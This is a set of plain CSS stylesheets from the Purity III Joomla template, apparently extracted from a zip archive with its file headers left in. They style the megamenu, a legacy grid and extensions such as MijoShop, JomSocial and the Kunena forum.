.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #ff8800;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKӜ�\�	�	,purity_iii/css/themes/orange/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-right: -20px;
  margin-left: -20px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\=[����(purity_iii/css/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\+e���)purity_iii/css/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\�/OO&purity_iii/css/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #0077bb;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #0077bb;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\BL���)purity_iii/css/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKӜ�\*�ن>>'purity_iii/css/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}PKӜ�\�y���&purity_iii/css/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\us"8�o�o$purity_iii/css/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #0077bb;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #0077bb;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #0077bb;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #0077bb;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #0077bb;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  left: auto;
  right: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #0077bb;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #00466e;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #0077bb;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #00466e;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #00466e;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
